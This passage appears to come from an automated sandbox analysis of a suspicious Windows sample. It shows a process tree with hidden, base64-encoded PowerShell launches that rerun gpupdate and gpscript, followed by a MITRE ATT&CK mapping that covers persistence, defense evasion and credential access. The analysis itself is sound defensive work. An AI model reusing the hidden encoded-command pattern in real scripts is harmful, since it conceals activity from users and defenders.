    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:2884
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:1376
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:568
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Drops file in System32 directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2084
- - C:\Windows\system32\gpupdate.exe
    "C:\Windows\system32\gpupdate.exe" /force
    3⤵
    PID:3028

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:776

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2476

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:3036

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Scheduled Task

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

System Information Discovery